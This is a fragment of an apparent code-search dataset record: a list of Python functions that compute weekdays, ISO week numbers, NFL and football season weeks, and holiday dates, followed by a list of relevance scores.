day_of_week(self):\n day_of_week_names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 
'Saturday', 'Sunday']\n diff = self.diff(Date(1, 1, 1970)) + 3\n while diff < 0:\n diff += 7\n print(day_of_week_names[diff % 7])", "def get_week(time_index):\n return np.array(time_index.week).reshape(-1,1)", "def gen_weeklyFrequency(self):\n\n if len(self.fields) == 0:\n return None\n\n if self.validator.validate(self.fields) == False:\n return None\n\n weeklyFrequency = 0\n dayFields = ['day1','day2','day3','day4','day5','day6','day7']\n for dayField in dayFields:\n if dayField in self.fields:\n if self.fields[dayField] == True:\n weeklyFrequency += 1\n\n return weeklyFrequency", "def get_today_week_number(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[1]", "def get_week_range(year, week):\n first_day = datetime.strptime(f\"{year}-W{week}-1\", \"%Y-W%W-%w\").date()\n last_day = first_day + timedelta(days=6)\n return first_day, last_day", "def dow(values, feature, parent): \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None", "def dow(values, feature, parent): \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None", "def week_fromordinal(cls, ordinal):\n return int(math.floor(cls.day_fromordinal(ordinal) / 7)) + 1", "def get_day_of_week(year: int, dow: int) -> List[date]:\n new_year = date(year, 1, 1)\n start_date = new_year + timedelta(days=dow - new_year.weekday())\n start_date = start_date + timedelta(days=7) if start_date < new_year else start_date\n\n dates = []\n while start_date.year == year:\n dates.append(start_date)\n start_date += timedelta(days=7)\n return dates", "def convert_date(year: str, week: str):\n date = datetime.fromisocalendar(int(year), int(week), 1)\n return date.strftime(\"%m/%d/%YZ\")", "def date_to_day_of_week(year, month, day):\n # Calculate the day offset from Jan, 1 in the specified year.\n day_num = date_to_day_of_year(year, month, day)\n\n is_pre_2k = year < 2000\n if is_pre_2k:\n # Calculate the number of days from the end of the year.\n num_days = days_in_year(year) - day_num + 1\n start, step = 1999, -1\n else:\n # Calculate the number of days from the beginning of the year.\n num_days = day_num - 1\n start, step = 2000, 1\n\n for _year in range(start, year, step):\n num_days += days_in_year(_year)\n\n # Add the number of days to the day number for Jan 1, 2000 modulus 7\n # to get the current day number.\n if is_pre_2k:\n num_days = -num_days\n\n return (JAN_1_2000_DAY_NUM + num_days) % 7", "def getCurrentWeek(self):\n return self.wcount % 48", "def test_date_accept_this_week(self):\n spi_search = \"find date this week\"\n inv_search = \"year:\" + 
datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(datetime.datetime.today().isoweekday()%7)), '%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def _labor_day(year):\n day = datetime(year, 9, 1)\n delta = timedelta(days=1)\n while day.weekday() != 0:\n day += delta\n return day", "def schedule_url(year, stype, week):\n xmlurl = 'http://www.nfl.com/ajax/scorestrip?'\n if stype == 'POST':\n week += 17\n if week == 21: # NFL.com you so silly\n week += 1\n return '%sseason=%s&seasonType=%s&week=%s' % (xmlurl, year, stype, week)", "def get_current_day_week_number(week_delta=0):\n return (datetime.today() + timedelta(weeks=week_delta)).isocalendar()[1]", "def return_football_season(date=datetime.datetime.today()):\n date_aux = subtract_months(date, 6)\n beginning_year = str(date_aux.year)\n ending_year = date_aux.year + 1\n ending_year = str(ending_year)[-2:]\n season = ''.join([beginning_year, '-', ending_year])\n return season", "def dateTimetoWeekend(dateList, startYear):\n weekHash = dateList.dt.week + 52 * (dateList.dt.year - startYear)\n return weekHash", "def __init__(self, y, w):\n for d in xrange(-10, 370):\n date = datetime.date(y, 1, 1) + datetime.timedelta(d)\n if date.isocalendar() == (y, w, 1):\n date_a = date\n break\n else:\n raise ValueError(\"Invalid week\")\n date_b = date_a + datetime.timedelta(7)\n super(Week, self).__init__(date_a, date_b)", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def forecast_weekly():\n forecast = get_forecast()\n daily = forecast.daily()\n return daily.summary", "def weeks_of_the_month(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[str, 'WeekNumber']]]]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def get_week_end(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof + TimeDelta(days=6 - (asof.isoweekday() - 1) % 7)", "def days_to_weeks(list_of_days):\n all_weeks = []\n for day in list_of_days:\n that_week = day.isocalendar()\n if (\n len(all_weeks) == 0\n or all_weeks[-1].year != that_week.year\n or all_weeks[-1].week != that_week.week\n ):\n all_weeks.append(that_week)\n return list(map(lambda iso: \"{}-{}\".format(iso.year, iso.week), all_weeks))", "def get_weekday(self):\n originDate = Date(1900, 1, 1)\n return WEEKDAYS[originDate.days_since(self) % 7]", "def WEEKDAY(\n serial_number: func_xltypes.XlNumber,\n return_type: func_xltypes.XlNumber = None\n) -> func_xltypes.XlNumber:\n\n date = utils.number_to_datetime(int(serial_number))\n\n if return_type is None:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 1:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n # weekday() is 0 based, starting on a Monday\n elif int(return_type) == 2:\n # Numbers 1 (Monday) through 7 (Sunday)\n weekDays = (1, 2, 3, 4, 5, 6, 7)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 3:\n # Numbers 0 (Monday) through 6 (Sunday)\n weekDays = (0, 1, 2, 3, 4, 5, 6)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 11:\n # Numbers 1 (Monday) through 7 (Sunday)\n weekDays = 
(1, 2, 3, 4, 5, 6, 7)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 12:\n # Numbers 1 (Tuesday) through 7 (Monday)\n weekDays = (7, 1, 2, 3, 4, 5, 6)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 13:\n # Numbers 1 (Wednesday) through 7 (Tuesday)\n weekDays = (6, 7, 1, 2, 3, 4, 5)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 14:\n # Numbers 1 (Thursday) through 7 (Wednesday)\n weekDays = (5, 6, 7, 1, 2, 3, 4)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 15:\n # Numbers 1 (Friday) through 7 (Thursday)\n weekDays = (4, 5, 6, 7, 1, 2, 3)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 16:\n # Numbers 1 (Saturday) through 7 (Friday)\n weekDays = (3, 4, 5, 6, 7, 1, 2)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 17:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n else:\n raise xlerrors.NumExcelError(\n f\"return_type needs to be omitted or one of 1, 2, 3, 11, 12, 13,\\\n 14, 15, 16 or 17. You supplied {return_type}\")", "def current_season_phase():\n _update_week_number()\n return _cur_season_phase", "def findWeekend(str):\n return int(re.search(\"(?<=wknd=)\\d*\", str)[0])", "def next_seven_day(self):\n today = datetime.date.today()\n week_next = today + datetime.timedelta(days=7)\n return week_next.strftime('%Y-%m-%d')", "def day_of_week(date: datetime) -> str:\n weekday = date.weekday()\n return calendar.day_name[weekday]", "def first_monday_of_week(year, week):\n weekyear = \"{} {} 1\".format(year, week)\n return time.asctime(time.strptime(weekyear, \"%Y %U %w\"))", "def isocalendar(self):\n year = self._year\n week1monday = _isoweek1monday(year)\n today = _ymd2ord(self._year, self._month, self._day)\n # Internally, week and day have origin 0\n week, day = divmod(today - week1monday, 7)\n if week < 0:\n year -= 1\n week1monday = _isoweek1monday(year)\n week, day = divmod(today - week1monday, 7)\n elif week >= 52:\n if today >= _isoweek1monday(year + 1):\n year += 1\n week = 0\n return _IsoCalendarDate(year, week + 1, day + 1)", "def week(self) -> Index:\n warnings.warn(\n \"`week` is deprecated in 3.5.0 and will be removed in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.week)", "def weekday(self):\n\n return func.extract('dow', self.start_date) + 1", "def twenty_seventeen():\n return 2017", "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def fromisocalendar(cls, year, week, day):\n # Year is bounded this way because 9999-12-31 is (9999, 52, 5)\n if not MINYEAR <= year <= MAXYEAR:\n raise ValueError(f\"Year is out of range\")\n\n if not 0 < week < 53:\n out_of_range = True\n\n if week == 53:\n # ISO years have 53 weeks in them on years starting with a\n # Thursday and leap years starting on a Wednesday\n first_weekday = _ymd2ord(year, 1, 1) % 7\n if first_weekday == 4 or (first_weekday == 3 and _is_leap(year)):\n out_of_range = False\n\n if out_of_range:\n raise ValueError(f\"Invalid week: {week}\")\n\n if not 0 < day < 8:\n raise ValueError(f\"Invalid weekday (range is [1, 7])\")\n\n # Now compute the offset from (Y, 1, 1) in days:\n day_offset = (week - 1) * 7 + (day - 1)\n\n # Calculate the ordinal day for monday, week 1\n day_1 = _isoweek1monday(year)\n ord_day = day_1 + day_offset\n\n return cls(*_ord2ymd(ord_day))", "def Day_of_week(day, month, year):\r\n if year % 4 == 0 and (year % 400 == 0 or year % 100 != 0):\r\n doomsday = 
[11, 29, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n else:\r\n doomsday = [10, 28, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n exact_day = ((day - doomsday[month-1]) + Dooms_day(year)) % 7\r\n character_day = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \r\n \"Friday\", \"Saturday\"]\r\n return character_day[exact_day]", "def day_of_week(dt):\n cday = dt\n mday = 2\n uday = cday.isocalendar()[2] + mday\n try:\n if uday > 7:\n CURRDAY = uday - 7\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week>7 : \", CURRDAY)\n else:\n CURRDAY = uday\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week : \", CURRDAY)\n return CURRDAY\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700;SCHEDULE ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def dateweek(line, date):\r\n\tindex = datetime.weekday(date)\r\n\tdateweek = '%s%s%s' % (date.day, cn2en.DATE_WEEK, cn2en.WEEKDAYS[index])\r\n\t\r\n\treturn dateweek == line", "def get_next_monday(date):\n return date + datetime.timedelta(days=-date.weekday(), weeks=1)", "def weeks_of_the_month(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def day_of_week():\n return calendar.day_name[datetime.date.today().weekday()]", "def week_of_month(dt):\n\n first_day = dt.replace(day=1)\n\n dom = dt.day\n adjusted_dom = dom + first_day.weekday()\n\n return int(ceil(adjusted_dom/7.0))", "def get_weekdays(date: str) -> list:\n parsed_date = parser.parse(date)\n day_of_week = parsed_date.weekday()\n first_day_of_week = parsed_date - datetime.timedelta(days=day_of_week)\n\n return holiday.create_date_range(first_day_of_week, 7)", "def day_of_week_for_start_day(self):\n import calendar\n\n day = self.idfobjects[\"RUNPERIOD\"][0][\"Day_of_Week_for_Start_Day\"]\n\n if day.lower() == \"sunday\":\n return calendar.SUNDAY\n elif day.lower() == \"monday\":\n return calendar.MONDAY\n elif day.lower() == \"tuesday\":\n return calendar.TUESDAY\n elif day.lower() == \"wednesday\":\n return calendar.WEDNESDAY\n elif day.lower() == \"thursday\":\n return calendar.THURSDAY\n elif day.lower() == \"friday\":\n return calendar.FRIDAY\n elif day.lower() == \"saturday\":\n return calendar.SATURDAY\n else:\n return 0", "def meetup_day(year, month, day_of_week, day_occurrence):\n \n cal = calendar.monthcalendar(year, month)\n day_of_week_index = days_of_week[day_of_week]\n \n not_teenth = day_occurrence != 'teenth'\n day_is_in_first_week = cal[0][day_of_week_index] != 0\n \n if not_teenth and day_is_in_first_week:\n week_index = week_indices[day_occurrence]\n \n elif not_teenth and not day_is_in_first_week:\n week_index = week_indices[day_occurrence] + 1\n \n else:\n for i in range(len(cal)):\n if cal[i][day_of_week_index] >= 10:\n week_index = i\n break\n\n date = cal[week_index][day_of_week_index]\n return datetime.date(year, month, date)", "def MLK(year):\n\n day = datetime.date(year, 1, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 3:\n return day\n day += datetime.timedelta(days=1)", "def get_current_week_range(self, currdate):\n dow_start = datetime.datetime.strftime(currdate, '%w')\n if dow_start == '0':\n week_start = currdate\n else:\n week_start = self.get_previous_byday('Sunday', currdate)\n\n week_end = week_start + datetime.timedelta(days=6)\n return (week_start, week_end)", "def date_with_day_of_week_appended(mydate): \n import datetime\n month, day, year = (int(x) for x in mydate.split('/')) \n shortened_year = abs(year) % 100 \n day_of_week = 
datetime.date(year, month, day).strftime(\"%A\")\n return \"%s/%s/%s %s\" % (month,day,shortened_year, day_of_week)", "def find_date(startdate, weekday, weeknumber):\n import datetime\n # The +1 makes this match up with linux times (day 1 = Monday)\n daysahead = weekday - (startdate.weekday() + 1)\n if daysahead < 0:\n # Target day already happened this week\n daysahead += 7\n # Add 7 days for each Week Of Month we want - but 'This' week is week 1\n daysahead += 7 * (weeknumber - 1)\n return startdate + datetime.timedelta(daysahead)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def dayofweek(day, month, year, formatresult=True):\n if formatresult is False:\n return calendar.weekday(year, month, day) + 1\n days = {\n 0: 'Monday',\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\"\n }\n return days[calendar.weekday(year, month, day)]", "def evening_twilight_6(self, date=None):\n self.site.horizon = self.horizon6\n self._set_site_date(date)\n r_date = self.site.next_setting(self.sun)\n r_date = self.date_to_local(r_date.datetime())\n return r_date", "def nth_dow_to_day(tupel, y):\r\n m = tupel[0]\r\n dow = tupel[1]\r\n n = tupel[2]\r\n\r\n if dow == 7:\r\n dow = 0\r\n\r\n first_dow = date_to_dow(y, m, 1) # the dow of the first of the month\r\n shift = dow - first_dow\r\n if shift < 0:\r\n shift += 7\r\n\r\n return shift + (7 * n) - 6", "def compute(year_N):\n\n sunday_counts = 0 \n\n # 1st of month on Jan 1901 is a Tuesday \n # variable keeps track of the first of month for the current month \n first_of_month = 2\n # 1 - Mon, 2 - Tuesday, 3 - Wed ...\n current_month = 1 \n year = 1901\n # Jan - 1 . One-based indexing \n\n \n while year <= year_N:\n \n # determines whether the year is a leap year \n if year % 4 == 0 and year % 100 != 0:\n leapYear = True \n elif year % 400 == 0:\n leapYear = True \n else:\n leapYear = False \n\n # loops through every month and keeps track of first_of_month \n # if first of month is a Sunday (7), increment sundays count \n while current_month <= 12:\n \n # if first_of_month of current month is a sunday, increment sundays count\n if first_of_month == 7:\n sunday_counts += 1 \n # first of month only takes value from 1 to 7 \n elif first_of_month > 7:\n first_of_month -= 7 \n\n if current_month in [4, 6, 9, 11]:\n # months with 30 days \n # next month's first of month will be 2 days of the week later. \n # E.g. April's 1st of month is Wed, May's 1st of month will be Fri \n first_of_month_increment = 2 # 30 % 28\n elif current_month == 2:\n # february \n if leapYear:\n first_of_month_increment = 1 \n else: \n first_of_month_increment = 0\n else:\n # months with 31 days \n first_of_month_increment = 3 # 31 % 28 \n\n # next month values \n current_month += 1 \n first_of_month += first_of_month_increment\n\n # Finished looping from January of year to December\n # next year values:\n year += 1 \n current_month = 1 \n # first_of_month value will stay the same \n\n return sunday_counts" ]
[ "0.7253059", "0.6891157", "0.68909645", "0.6705168", "0.66147095", "0.6535417", "0.63276374", "0.6250827", "0.62457407", "0.61644757", "0.6102457", "0.60741466", "0.59655815", "0.59634364", "0.59619147", "0.5926681", "0.5889611", "0.5864661", "0.5860158", "0.5819684", "0.58102256", "0.5803096", "0.5769433", "0.5759181", "0.57462853", "0.5728721", "0.5720337", "0.5683695", "0.5683139", "0.56718516", "0.5663745", "0.5649805", "0.5596048", "0.5590334", "0.5570848", "0.5535454", "0.5533866", "0.5523761", "0.5520232", "0.549952", "0.5480408", "0.54593253", "0.5436293", "0.54258525", "0.54022807", "0.54000765", "0.5377228", "0.5374396", "0.5369371", "0.53628534", "0.53628534", "0.53498155", "0.5336595", "0.5325473", "0.53230524", "0.53215176", "0.5319168", "0.53145796", "0.5306232", "0.5298761", "0.5277226", "0.5263977", "0.52533305", "0.5250124", "0.52451706", "0.52408165", "0.5239411", "0.5236587", "0.5235104", "0.52257425", "0.5216507", "0.5197355", "0.51894975", "0.51765555", "0.5173755", "0.51552624", "0.513837", "0.5136225", "0.5130756", "0.5127778", "0.51170063", "0.511581", "0.5110726", "0.51026076", "0.5100001", "0.50903034", "0.50869054", "0.5083932", "0.50765246", "0.50751215", "0.5073357", "0.50726664", "0.5072107", "0.5071311", "0.505879", "0.50564927", "0.50554806", "0.5041686", "0.50354624", "0.50185895" ]
0.7307077
0
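On its own, the `get_week_from_date` document above is not runnable: it needs a `_labor_day` helper, and a matching implementation happens to appear in this record's negatives list. A self-contained sketch combining the two, with spot checks on dates chosen here purely for illustration:

```python
import math
from datetime import datetime, timedelta

def _labor_day(year):
    # Labor Day is the first Monday of September (weekday() == 0 is Monday);
    # this mirrors the _labor_day snippet in the negatives above.
    day = datetime(year, 9, 1)
    while day.weekday() != 0:
        day += timedelta(days=1)
    return day

def get_week_from_date(date) -> int:
    month, year = date.month, date.year
    if month < 4:
        year -= 1  # January-March dates count toward the previous season.
    ld = _labor_day(year)
    wk1_wed = ld + timedelta(days=2)  # Wednesday of Labor Day week opens week 1.
    days_since = (date - wk1_wed).days
    weeks_since = days_since / 7.
    return int(math.floor(weeks_since) + 1)

# 2019 Labor Day was Mon 2019-09-02, so week 1 starts Wed 2019-09-04.
print(get_week_from_date(datetime(2019, 9, 5)))    # -> 1 (opening Thursday)
print(get_week_from_date(datetime(2019, 12, 29)))  # -> 17 (final regular-season Sunday)
```

Because `math.floor` rounds toward negative infinity, dates before week 1's Wednesday yield weeks of 0 or less, consistent with the query's note that the value is not capped.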
Get current NFL week (ESPN scoring period)
def current_week() -> int:
    now = datetime.now()
    return get_week_from_date(now)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current_week(self):\n\n if not self.iso_equal() and self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 2\n if not self.iso_equal() or self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 1 \n return self.time_stamp_iso[1]", "def weekly():", "def getCurrentWeek(self):\n return self.wcount % 48", "def get_week_date():\n return timezone.now()+timezone.timedelta(days=6)", "def weekNumber(self): # real signature unknown; restored from __doc__\r\n pass", "def week(self):\n if self._week.lower() == 'wild card':\n return WILD_CARD\n if self._week.lower() == 'division':\n return DIVISION\n if self._week.lower() == 'conf. champ.':\n return CONF_CHAMPIONSHIP\n if self._week.lower() == 'superbowl':\n return SUPER_BOWL\n return self._week", "def get_current_week(self):\n result = self._method_call(\"CurrentWeek\")\n return int(result)", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def get_current_day_week_number(week_delta=0):\n return (datetime.today() + timedelta(weeks=week_delta)).isocalendar()[1]", "def reporting_week(self):\n\n print(\"Week Numbers:\")\n print(self.time_stamp)\n print(self.time_stamp_iso)\n print(\"Current = {}\".format(self.current_week()))\n print(\"Reporting = {}\".format(self.current_week() - 1))", "def get_today_week_number(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[1]", "def nflweek(self, irc, msg, args, optlist, optweek):\n \n url = self._b64decode('aHR0cDovL3MzLmFtYXpvbmF3cy5jb20vbmZsZ2MvYWxsU2NoZWR1bGUuanM=')\n \n usePre, useNext, outputWeek = False, False, False\n for (option, arg) in optlist:\n if option == 'pre':\n usePre = True\n \n if optweek:\n if optweek == \"next\":\n useNext = True\n elif optweek.isdigit():\n if usePre: \n if 1 <= int(optweek) <= 4:\n outputWeek = \"Preseason Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Preseason week number must be between 1 and 4.\")\n return\n else:\n if 1 <= int(optweek) <= 17:\n outputWeek = \"Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Week must be between 1-17\")\n return \n\n try:\n req = urllib2.Request(url)\n html = (urllib2.urlopen(req)).read()\n except:\n irc.reply(\"Failed to open: %s\" % url)\n return\n \n jsondata = json.loads(html)\n\n week = jsondata.get('week', None) # work with the week data so we know where we are.\n\n if week is None:\n irc.reply(\"Failed to load schedule.\")\n return\n\n currentWeekName = week.get('current', {'current': None}).get('weekName', None) \n nextWeekName = week.get('next', {'next': None}).get('weekName', None) \n\n if currentWeekName is None:\n irc.reply(\"Cannot figure out the current week.\")\n return\n\n games = jsondata.get('content', None) # data in games.\n \n if games is None:\n irc.reply(\"Failed to load the games data.\")\n return\n \n if outputWeek:\n games = [item['games'] for item in games if item['weekName'] == outputWeek]\n weekOutput = outputWeek\n elif useNext:\n games = [item['games'] for item in games if item['weekName'] == nextWeekName]\n weekOutput = nextWeekName\n else:\n games = [item['games'] for item in games if item['weekName'] == currentWeekName]\n weekOutput = currentWeekName\n \n append_list = []\n\n for games in games:\n for t in games:\n awayTeam = self._translateTeam('team', 'nid', t['awayTeamId'])\n homeTeam = self._translateTeam('team', 'nid', t['homeTeamId'])\n append_list.append(\"[\" + t['date']['num'] + \"] \" + awayTeam + \"@\" + homeTeam + \" 
\" + t['date']['time'])\n \n descstring = string.join([item for item in append_list], \" | \")\n output = \"{0} :: {1}\".format(ircutils.bold(weekOutput), descstring)\n \n irc.reply(output)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def ISOWEEKNUM(date):\n return _make_datetime(date).isocalendar()[1]", "def current_week_number(date=datetime.datetime.now()):\n return int(date.strftime(\"%W\"))", "def get_week():\n now = dt.now().date()\n return Week.objects.filter(date__lte=now).order_by('-date').first()", "def day_of_week(self):\n day_of_week_names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday']\n diff = self.diff(Date(1, 1, 1970)) + 3\n while diff < 0:\n diff += 7\n print(day_of_week_names[diff % 7])", "def CONST_WEEK_TIMESTAMP() -> int:\n return 604800", "def forecast_weekly():\n forecast = get_forecast()\n daily = forecast.daily()\n return daily.summary", "def get_week_frame():\n now = datetime.now()\n\n week_start = now - timedelta(days=now.weekday(),\n hours=now.hour,\n minutes=now.minute,\n seconds=now.second)\n week_end = now + timedelta(days=6 - now.weekday(),\n hours=23 - now.hour,\n minutes=59 - now.minute,\n seconds=59 - now.second)\n\n return week_start, week_end", "def get_week(time_index):\n return np.array(time_index.week).reshape(-1,1)", "def week(update: Update, _: CallbackContext) -> None:\n running_total, average_dose_per_day = return_weekly_figure()\n text = \\\n (\n \"\\n📅 *Rolling 7 Day Stats*\\n\" \n + \"\\n\\t\\t\\t📈 Rolling 7 Day Doses - \" + str('{:,}'.format(running_total))\n + \"\\n\\t\\t\\t💉 Average Daily Doses - \" + str('{:,}'.format(average_dose_per_day)) \n )\n update.message.reply_markdown(text)\n logger.info(\"Getting week update for \" + str(update.message.chat_id))", "def GetWeekNum(self, date):\n (y, m, d) = date.split('-')\n return (dt.date(int(y), int(m), int(d)) - self.START_DATE).days / 7", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. 
JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def get_seven_days_stat(cls):\n return cls.get_specified_days_stat(7)", "def dow(self):\n comparator = Date(11, 12, 2014) # known to be a 'Wednesday'\n DOW = ['Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday', 'Monday', 'Tuesday']\n diff = self.diff(comparator)\n return DOW[diff % 7]", "def day_of_week():\n return calendar.day_name[datetime.date.today().weekday()]", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def week_days(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"week_days\")", "def _unit_wk(self):\n return ((self.time_base * 60.0) * 24.0) * 7", "def week(self) -> Index:\n warnings.warn(\n \"`week` is deprecated in 3.5.0 and will be removed in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.week)", "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum = TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def day_of_week(self) -> str:\n return pulumi.get(self, \"day_of_week\")", "def day_of_week(self) -> str:\n return pulumi.get(self, \"day_of_week\")", "def get_weekday(self):\n originDate = Date(1900, 1, 1)\n return WEEKDAYS[originDate.days_since(self) % 7]", "def weeks_of_the_month(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[str, 'WeekNumber']]]]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def day_of_the_week(arg):", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def unit_wk(self):\n return ((self.time_base * 60.0) * 24.0) * 7", "def getWeeks(year):\n url = \"http://www.boxofficemojo.com/weekend/?yr=%d\" % year\n src = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(src, 'html.parser')\n chart = soup.find(border=\"0\", cellspacing=\"1\", cellpadding=\"5\")\n data = parseTable(chart)\n weeks = [int(row[-1]) for row in data[1:]]\n return weeks", "def weeks_of_the_month(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def get_weekday(self):\n weekdays = dict(PRODUCT_WEEKDAYS)\n return weekdays.get(self.weekday, \"N/A\")", "def get_week_end(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof + TimeDelta(days=6 - (asof.isoweekday() - 1) % 7)", "def get_current_week_range(self, currdate):\n dow_start = datetime.datetime.strftime(currdate, '%w')\n if dow_start == 
'0':\n week_start = currdate\n else:\n week_start = self.get_previous_byday('Sunday', currdate)\n\n week_end = week_start + datetime.timedelta(days=6)\n return (week_start, week_end)", "def current_year_and_week():\n _update_week_number()\n return _cur_year, _cur_week", "def getWeeksToExpire(self):\n cert = self.getLatestValidCertification()\n if cert == None:\n return ''\n date = cert.getValidTo().asdatetime().date();\n return date - date.today()", "def the_week_url():\n return '/timeline/%d/%02d/%d/' % \\\n (datetime.now().year, datetime.now().month, timekit.monthweek(datetime.now()))", "def work_refresh(self):\n now = dt.now()\n self.eisenhower_priority()\n p_week = now.isocalendar()[1] - self.work_datetime.isocalendar()[1]\n\n if (1 <= p_week) and (self.priority not in [1, 2]):\n self.time_ntf = now\n else:\n pass", "def findWeekend(str):\n return int(re.search(\"(?<=wknd=)\\d*\", str)[0])", "def get_time_last_week():\n current_time = arrow.utcnow() # Get the current UTC Time\n return current_time.shift(weeks=-1) # Return the shifted time by -1 weeks", "def news_for_week(self):\n\n raise NotImplementedError", "def GetWeekDay(self):\n if self.day is None:\n if self.week:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n self.week,\n None)\n elif self.month is None:\n if self.year is None:\n return (self.century, None, None, None, None)\n else:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n None,\n None)\n else:\n raise DateTimeError(\"can't get week day with month precision\")\n else:\n century, year, ordinalDay = self.GetOrdinalDay()\n year += century * 100\n if LeapYear(year):\n yearLength 